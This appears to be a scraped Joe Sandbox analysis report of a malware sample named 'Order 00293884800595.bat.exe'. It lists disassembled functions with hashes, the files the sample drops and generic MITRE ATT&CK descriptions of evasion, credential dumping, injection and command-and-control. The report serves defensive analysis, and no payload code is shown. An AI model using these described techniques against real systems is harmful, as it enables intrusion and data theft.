Function 35FB42E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB45A8
$~q, xrefs: 35FB454F
$~q, xrefs: 35FB45B4
$~q, xrefs: 35FB4543

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q
API String ID: 0-2080730351
Opcode ID: 0a9325a1664eb7f6c27b928f918ed4fdd03e6c9112e5353bbafe346c9d25148d
Instruction ID: 9eba4a6b718509388165fb3951a5d6cc2867b892327821c2d20893fcfe8b2369
Opcode Fuzzy Hash: 0a9325a1664eb7f6c27b928f918ed4fdd03e6c9112e5353bbafe346c9d25148d
Instruction Fuzzy Hash: 41B14C74A00608CBEB14DFA5C594A9EB7B3FF88301F258929D416EB355DBB4DC86CB81

Function 35FB4700 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR~q, xrefs: 35FB47F3
LR~q, xrefs: 35FB4842
$~q, xrefs: 35FB478B
$~q, xrefs: 35FB477F

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: LR~q$LR~q$$~q$$~q
API String ID: 0-97351441
Opcode ID: 25ce1e4fb9552ad0f46cfffc9ba0c050204ce7bbab368d5d14b7c29ded4dee4d
Instruction ID: 46ffd7574b791e7ee5f9dd3dce4ead012cfb41669fb9aace16f27e5f3088b4c2
Opcode Fuzzy Hash: 25ce1e4fb9552ad0f46cfffc9ba0c050204ce7bbab368d5d14b7c29ded4dee4d
Instruction Fuzzy Hash: CE51DF34B00606DFDF08DB69C959A6AB7E7FF89300F108969E4129B395DBB0EC01CB94

Function 35FB6BF9 Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB6D7D
$~q, xrefs: 35FB6DD5
$~q, xrefs: 35FB6D29
$~q, xrefs: 35FB6DAC

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q
API String ID: 0-2080730351
Opcode ID: acccd79a36c6b9e391f97d67f5a571ceb446be2f99fe86aee6968a32e51ff813
Instruction ID: 8f316af96b5486b6c712a242620bb8fcdbe53ad26213836f16a4ab96fe308c55
Opcode Fuzzy Hash: acccd79a36c6b9e391f97d67f5a571ceb446be2f99fe86aee6968a32e51ff813
Instruction Fuzzy Hash: C5519E78B00208CBDF15EBA5D590A9EB7B2FB88351F508929D806EB344DB71EC42CBC4

Function 35FB6C85 Relevance: 5.1, Strings: 4, Instructions: 115COMMON

Download Yara Rule

Strings

$~q, xrefs: 35FB6D7D
$~q, xrefs: 35FB6DD5
$~q, xrefs: 35FB6D29
$~q, xrefs: 35FB6DAC

Memory Dump Source

Source File: 00000008.00000002.1807124065414.0000000035FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 35FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_35fb0000_Order 00293884800595.jbxd

Similarity

API ID:
String ID: $~q$$~q$$~q$$~q
API String ID: 0-2080730351
Opcode ID: e1b9aba96fa56e96e034178a85ad0927394bcedc036d6cbb2fe65da8120ab7f5
Instruction ID: cb973affbac3077d96194f788441a0034ee097015231698a1f77c3ba5a2a247d
Opcode Fuzzy Hash: e1b9aba96fa56e96e034178a85ad0927394bcedc036d6cbb2fe65da8120ab7f5
Instruction Fuzzy Hash: A5418D78B00218CBDF15EBA5D590A9DB3B2FB88352F148929D8069B349DBB1DC46CB84

Function 00405D85 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7

Memory Dump Source

Source File: 00000008.00000002.1807104843266.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1807104810016.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104883468.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104918555.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Order 00293884800595.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Order 00293884800595.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\App.ini

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\BgImage.dll

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\UserInfo.dll

C:\Users\user\AppData\Local\Temp\nsf55F0.tmp\nsExec.dll

C:\Users\user\AppData\Local\Temp\tmc.ini

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Allopurinol.flu

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Charting.skr

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Incute.Reb

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Ragworm.Loy

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\materialiter.sig

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\preinvest.pri

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\Figurmrkerne\ridningen.txt

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Tyndstegsfilets\lvens.flb

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\chokoladeforretning.mar

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\doubling.reg

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\hmoriderne.ner

Windows Analysis Report
Order 00293884800595.bat.exe

Function 004033D8 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 430
stringfilecomCOMMON

Function 0040550F Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405A4F Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403E33 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403A96 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402F31 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181
memoryCOMMON

Function 00406320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 208
stringCOMMON

Function 0040177E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 004053D1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Function 00403168 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
COMMON

Function 00406647 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Function 6CA5176B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 004024A3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 00405E4F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre